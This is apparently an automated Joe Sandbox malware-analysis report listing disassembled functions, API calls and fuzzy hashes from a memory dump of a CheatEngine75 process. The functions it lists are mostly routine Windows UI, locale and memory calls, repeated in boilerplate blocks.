Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: AllocH_prolog3H_prolog3_catchLocal
String ID:
API String ID: 1948148156-0
Opcode ID: 5dec160f113ec9ac43d1b18142b1c30ace80a11059d9697c5ab71dfabc215504
Instruction ID: ec547b07e4b92d20540938b6a9142a1839420f7ff2918f10ef8df1afc04d6659
Opcode Fuzzy Hash: 5dec160f113ec9ac43d1b18142b1c30ace80a11059d9697c5ab71dfabc215504
Instruction Fuzzy Hash: 1DE012F5A9263457EB559E754A23B5D6B506F00F88F40015AE6407B381CFBD4D4187C6

Function 6B4D357A Relevance: 1.3, APIs: 1, Instructions: 11memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000000,?,6B4D3B5D,00000010,?,?,00000000,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3582

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 603886cd130a0237f474d9db134c529dff7915508ef27cd73f091ebd1c2fb21e
Instruction ID: 870c80c44e088347da43dba94add51a9e1ca86a2a6c26fe0142821fc8e220e87
Opcode Fuzzy Hash: 603886cd130a0237f474d9db134c529dff7915508ef27cd73f091ebd1c2fb21e
Instruction Fuzzy Hash: 64C02B3514030C37FB003BE28C1BF8A3B0C5B21A80F004020F70C85180DB79D01082BE

Non-executed Functions

Function 6B4EFB99 Relevance: 27.4, APIs: 18, Instructions: 387windowkeyboardCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 6B4EFC07
GetKeyState.USER32(00000010), ref: 6B4EFC3A
SendMessageW.USER32(?,000000B0,?,?), ref: 6B4EFC59
MessageBeep.USER32(000000FF), ref: 6B4EFFAC

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Message$Send$BeepState
String ID:
API String ID: 4005977132-0
Opcode ID: 075798bf50812aa4dfb064598689d0091577dadafa2b542d50cbea5736c000a4
Instruction ID: 1e64f3a5638ee02daed48ac5f73b465e10165fad553bb661f8c9f470df32cddd
Opcode Fuzzy Hash: 075798bf50812aa4dfb064598689d0091577dadafa2b542d50cbea5736c000a4
Instruction Fuzzy Hash: 06D17936A01109FBEF11DBA4D984FDEBBB9FF05312F100596E512E7290D738AA46DB60

Function 6B4E0F67 Relevance: 10.6, APIs: 7, Instructions: 138fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6B4E0F71
PathIsUNCW.SHLWAPI(?,?,?), ref: 6B4E1021
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6B4E1045
GetFullPathNameW.KERNEL32(?,00000104,?,?,00000268,6B4E07DE,?,?,00000000), ref: 6B4E0FA4

Part of subcall function 6B4E0F25: GetLastError.KERNEL32(?,?,?,6B4E1056,?,?), ref: 6B4E0F31

Part of subcall function 6B4E0857: PathStripToRootW.SHLWAPI(00000000), ref: 6B4E088B

CharUpperW.USER32(?), ref: 6B4E1073
FindFirstFileW.KERNEL32(?,?), ref: 6B4E108B
FindClose.KERNEL32(00000000), ref: 6B4E1097

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Path$Find$CharCloseErrorFileFirstFullH_prolog3_InformationLastNameRootStripUpperVolume
String ID:
API String ID: 2323451338-0
Opcode ID: 41a42a55202d0d7facb0e732e7163897e325a02f66fa3e601d3a1f0191bee130
Instruction ID: 431a030423cf65e8950d2ab551d7356bd096e5ea7f61de5c2f490091c8c57e57
Opcode Fuzzy Hash: 41a42a55202d0d7facb0e732e7163897e325a02f66fa3e601d3a1f0191bee130
Instruction Fuzzy Hash: 954196B1904115AFDB24AB35CC8AFBEB37CBF00715F004599E459E2250EF79AE42CA71

Function 6B62388C Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 6B615FC2: GetLastError.KERNEL32(00000000,?,6B61F6AE), ref: 6B615FC6
Part of subcall function 6B615FC2: SetLastError.KERNEL32(00000000,00000000,6B605FBB,00000008,000000FF), ref: 6B616068

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6B6238E0
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6B62392A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6B6239F0

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 1d8bd5f879c80fad1238116494c6666ee8db5b99ad4ff8cb38e1527db86dcd2d
Instruction ID: 0cb3cec6651cb43ffad55f9819b9808fffa1bce67ab1feaa611043e372c8679b
Opcode Fuzzy Hash: 1d8bd5f879c80fad1238116494c6666ee8db5b99ad4ff8cb38e1527db86dcd2d
Instruction Fuzzy Hash: 9D617EB19142179FFB288E29C982BAA77B8EF05700F1040BAE915C6684FB3CD984CF54

Function 6B623ADF Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 6B615FC2: GetLastError.KERNEL32(00000000,?,6B61F6AE), ref: 6B615FC6
Part of subcall function 6B615FC2: SetLastError.KERNEL32(00000000,00000000,6B605FBB,00000008,000000FF), ref: 6B616068

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6B623B33

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 716ac286ed74391eb5447eba94fd1890ec21d61bc092f8c073d6ef998a29c0e6
Instruction ID: a4676c58fc2f6aab374719e3c490ae00dc992566ce6c1af9dc4c3fbbdd360415
Opcode Fuzzy Hash: 716ac286ed74391eb5447eba94fd1890ec21d61bc092f8c073d6ef998a29c0e6
Instruction Fuzzy Hash: 5E21C2B6A14206AFFB288E29CC41EAA73B8EF65715B0040BAED05C7140EB3CE9408F54

Function 6B623801 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6B615FC2: GetLastError.KERNEL32(00000000,?,6B61F6AE), ref: 6B615FC6
Part of subcall function 6B615FC2: SetLastError.KERNEL32(00000000,00000000,6B605FBB,00000008,000000FF), ref: 6B616068

EnumSystemLocalesW.KERNEL32(6B623ADF,00000001,?,?,-00000050,?,6B623E88,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6B62384B

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 643c5432f062c1aa55b629b73a1d131fe5915f0b296e587db3b7af5f158edbd2
Instruction ID: 4e3d611dc4c8cc92a22e5ea3f83b4f02c89e16f09813e5cb8e0464485b150938
Opcode Fuzzy Hash: 643c5432f062c1aa55b629b73a1d131fe5915f0b296e587db3b7af5f158edbd2
Instruction Fuzzy Hash: B8F0F6B63043085FEB245F39D881A6A7BA5FF80768B05447CFA468B650C7799C42CF54

Function 6B619A82 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6B614C30: EnterCriticalSection.KERNEL32(-6B696968,?,6B61F391,00000000,6B689528,0000000C,6B61F359,80004005,?,6B618D00,80004005,?,6B616160,00000001,00000364,00000000), ref: 6B614C3F

EnumSystemLocalesW.KERNEL32(6B619A75,00000001,6B689428,0000000C,6B619EEA,00000000), ref: 6B619ABA

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: d0322d7857e978783a8c5ceee68cc86d59f228780a8c4a78ff35bd72af4680bc
Instruction ID: f7b7dbeafcf0a954518d1e5ed406eaca423d63376bb67b6d16f50c7f58358751
Opcode Fuzzy Hash: d0322d7857e978783a8c5ceee68cc86d59f228780a8c4a78ff35bd72af4680bc
Instruction Fuzzy Hash: D3F037B2A05204EFDB00DFA9D542B9C77E0FB49728F00415AE515DB2D0CB7999058FA4

Function 6B511B6F Relevance: 66.7, APIs: 19, Strings: 19, Instructions: 195COMMON

Download Yara Rule

APIs

OpenThemeData.UXTHEME(?,WINDOW,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511B8B
OpenThemeData.UXTHEME(?,TOOLBAR,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511BAA
OpenThemeData.UXTHEME(?,BUTTON,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511BC9
OpenThemeData.UXTHEME(?,STATUS,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511BE8
OpenThemeData.UXTHEME(?,REBAR,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511C07
OpenThemeData.UXTHEME(?,COMBOBOX,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511C26
OpenThemeData.UXTHEME(?,PROGRESS,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511C45
OpenThemeData.UXTHEME(?,HEADER,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511C64
OpenThemeData.UXTHEME(?,SCROLLBAR,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511C83
OpenThemeData.UXTHEME(?,EXPLORERBAR,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511CA2
OpenThemeData.UXTHEME(?,TREEVIEW,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511CC1
OpenThemeData.UXTHEME(?,STARTPANEL,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511CE0
OpenThemeData.UXTHEME(?,TASKBAND,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511CFF
OpenThemeData.UXTHEME(?,TASKBAR,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511D1E
OpenThemeData.UXTHEME(?,SPIN,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511D3D
OpenThemeData.UXTHEME(?,TAB,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511D5C
OpenThemeData.UXTHEME(?,TOOLTIP,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511D7B
OpenThemeData.UXTHEME(?,TRACKBAR,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511D9A
OpenThemeData.UXTHEME(00000000,MENU,?,?,6B50991B,?,6B50996A,00000004,6B4E2B4D,00000000,00000004,6B4E29D1), ref: 6B511DB5

Strings

TASKBAND, xrefs: 6B511CF9
SCROLLBAR, xrefs: 6B511C7D
MENU, xrefs: 6B511DAF
TASKBAR, xrefs: 6B511D18
TOOLBAR, xrefs: 6B511BA4
HEADER, xrefs: 6B511C5E
EXPLORERBAR, xrefs: 6B511C9C
PROGRESS, xrefs: 6B511C3F
STATUS, xrefs: 6B511BE2
TOOLTIP, xrefs: 6B511D75
BUTTON, xrefs: 6B511BC3
SPIN, xrefs: 6B511D37
REBAR, xrefs: 6B511C01
TAB, xrefs: 6B511D56
COMBOBOX, xrefs: 6B511C20
STARTPANEL, xrefs: 6B511CDA
WINDOW, xrefs: 6B511B85
TREEVIEW, xrefs: 6B511CBB
TRACKBAR, xrefs: 6B511D94

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: DataOpenTheme
String ID: BUTTON$COMBOBOX$EXPLORERBAR$HEADER$MENU$PROGRESS$REBAR$SCROLLBAR$SPIN$STARTPANEL$STATUS$TAB$TASKBAND$TASKBAR$TOOLBAR$TOOLTIP$TRACKBAR$TREEVIEW$WINDOW
API String ID: 1744092376-1233129369
Opcode ID: 662ea271bd320e352067cd332fe0f0c3a4d54f2ea7647c98f5355a4d27a9260b
Instruction ID: cb79fe64d93d76b969b4868ef709d33fb87f3200837e46731044d16b37c21c64
Opcode Fuzzy Hash: 662ea271bd320e352067cd332fe0f0c3a4d54f2ea7647c98f5355a4d27a9260b
Instruction Fuzzy Hash: 2C6123B9B5C7259FFB00AF768949D967BA4BF3AB4830059E4F904D7221EB7CD4008B94

Function 6B4FEAB1 Relevance: 34.7, APIs: 23, Instructions: 236windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6B4FEABB
CopyImage.USER32 ref: 6B4FEAF1

Part of subcall function 6B50209F: __EH_prolog3_GS.LIBCMT ref: 6B5020A9
Part of subcall function 6B50209F: GetObjectW.GDI32(?,00000018,?), ref: 6B5020D1
Part of subcall function 6B50209F: GetObjectW.GDI32(?,00000054,?), ref: 6B502116

GetObjectW.GDI32(?,00000018,?), ref: 6B4FEB2B
DeleteObject.GDI32(?), ref: 6B4FEBA8
CreateCompatibleDC.GDI32(00000000), ref: 6B4FEBD6
GetObjectW.GDI32(?,00000018,?), ref: 6B4FEBF2
GetObjectW.GDI32(?,00000018,?), ref: 6B4FEC3C
SelectObject.GDI32(?,?), ref: 6B4FEC5F
SelectObject.GDI32(?,?), ref: 6B4FEC96
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6B4FECBC
SelectObject.GDI32(?,00000000), ref: 6B4FECD7
CreateCompatibleDC.GDI32(?), ref: 6B4FED07
SelectObject.GDI32(?,?), ref: 6B4FED25
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6B4FED64
SelectObject.GDI32(?,?), ref: 6B4FED79
BitBlt.GDI32(?,?,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6B4FEDAF
SelectObject.GDI32(?,?), ref: 6B4FEDC1
SelectObject.GDI32(?,00000000), ref: 6B4FEDD2
DeleteObject.GDI32(?), ref: 6B4FEDE3
DeleteObject.GDI32(?), ref: 6B4FEE2B
SelectObject.GDI32(?,?), ref: 6B4FEE43
SelectObject.GDI32(?,00000000), ref: 6B4FEE54
DeleteObject.GDI32(?), ref: 6B4FEE60

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Object$Select$Delete$CompatibleCreate$H_prolog3_$BitmapCopyImage
String ID:
API String ID: 1780083495-0
Opcode ID: 45c730fe826e9f19bbc520df5af21c95703c145703d06858a98c0cb7041bbb56
Instruction ID: 5e47b1a0fa2363c3cbfccffdae29eff5810fe77676061cc28fcc0c08343a14df
Opcode Fuzzy Hash: 45c730fe826e9f19bbc520df5af21c95703c145703d06858a98c0cb7041bbb56
Instruction Fuzzy Hash: DDA1F770911629EFDB219F61CC84FE9BBB9BF49301F0042D8E659A3260DB359E91DF90

Function 6B4EAA0F Relevance: 22.7, APIs: 15, Instructions: 176windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6B4EAA16
GetIconInfo.USER32(?,?), ref: 6B4EAAB7
GetObjectW.GDI32(?,00000018,?), ref: 6B4EAAC6
CreateCompatibleDC.GDI32(00000000), ref: 6B4EAAF5
CopyImage.USER32(?,00000000,00000000,00000000,00002000), ref: 6B4EAB11
SelectObject.GDI32(?,00000000), ref: 6B4EAB26
FillRect.USER32(?,?,?), ref: 6B4EAB69
DrawIconEx.USER32(?,00000000,00000000,?,?,?,00000000,00000000,00000003), ref: 6B4EAB8A
SelectObject.GDI32(?,?), ref: 6B4EAB9B
DeleteObject.GDI32(?), ref: 6B4EABA4
DeleteObject.GDI32(?), ref: 6B4EABB9
DeleteObject.GDI32(?), ref: 6B4EABC2
DestroyIcon.USER32(?,00000070,6B4EA508,?,00000000,00000000,00000000,00000000,00000000), ref: 6B4EAC15
DestroyIcon.USER32(?), ref: 6B4EAC22
DestroyIcon.USER32(?), ref: 6B4EAC2D

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Object$Icon$DeleteDestroy$Select$CompatibleCopyCreateDrawFillH_prolog3_ImageInfoRect
String ID:
API String ID: 2061919445-0
Opcode ID: 9a9883df9a81483aa598503767d65a6a70b96834b13f73c19e11fd93fe35b947
Instruction ID: 3703ae3705ee40b6d9ba1b950b87dd1ad9baef057c290693317f19510b8aff6e
Opcode Fuzzy Hash: 9a9883df9a81483aa598503767d65a6a70b96834b13f73c19e11fd93fe35b947
Instruction Fuzzy Hash: 1B61F771D0020AAFDF55DFA4C995EEEBBB5FF48302F148169E911E7260DB399902CB60

Function 6B4F3BA6 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 6B4F3BE0
ReleaseCapture.USER32 ref: 6B4F3BEA
GetClientRect.USER32(?,?), ref: 6B4F3C03
GetSystemMetrics.USER32(00000015), ref: 6B4F3C1F
GetSystemMetrics.USER32(00000015), ref: 6B4F3C46
SendMessageW.USER32(?,0000120C,00000000,00000001), ref: 6B4F3C87
SendMessageW.USER32(?,0000120C,00000001,00000001), ref: 6B4F3CB7
GetCapture.USER32 ref: 6B4F3CE0
ReleaseCapture.USER32 ref: 6B4F3CEA
GetClientRect.USER32(?,?), ref: 6B4F3D03
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 6B4F3D58

Part of subcall function 6B4F5A74: __EH_prolog3_GS.LIBCMT ref: 6B4F5A7B
Part of subcall function 6B4F5A74: IsRectEmpty.USER32(?), ref: 6B4F5A96
Part of subcall function 6B4F5A74: InvertRect.USER32(?,?), ref: 6B4F5AAC
Part of subcall function 6B4F5A74: SetRectEmpty.USER32(?), ref: 6B4F5ABF

Strings

0#Lk, xrefs: 6B4F3C6E, 6B4F3CA3, 6B4F3D44

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Rect$Capture$ClientEmptyMessageMetricsReleaseSendSystem$H_prolog3_InvertRedrawWindow
String ID: 0#Lk
API String ID: 174338775-1841850333
Opcode ID: bd201bb241717611869b7101e66662fa3970cbbdd220c28743927ae9d7c008d8
Instruction ID: bded1bc3ffd0b329a197b260480675cc34678557c8a7aeb23114f071746b7bb1
Opcode Fuzzy Hash: bd201bb241717611869b7101e66662fa3970cbbdd220c28743927ae9d7c008d8
Instruction Fuzzy Hash: DB516C72A00619AFCF14DFB5C984AADBBB9FF49314F104269E819A7350DB34AE41CF91

Function 6B4C79E8 Relevance: 19.7, APIs: 10, Strings: 1, Instructions: 487COMMON

Download Yara Rule

Strings

0#Lk, xrefs: 6B4C7AFD, 6B4C7B86, 6B4C7BE2, 6B4C7C6D, 6B4C7CD4, 6B4C7D09, 6B4C7D35, 6B4C7DE9, 6B4C7F69

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
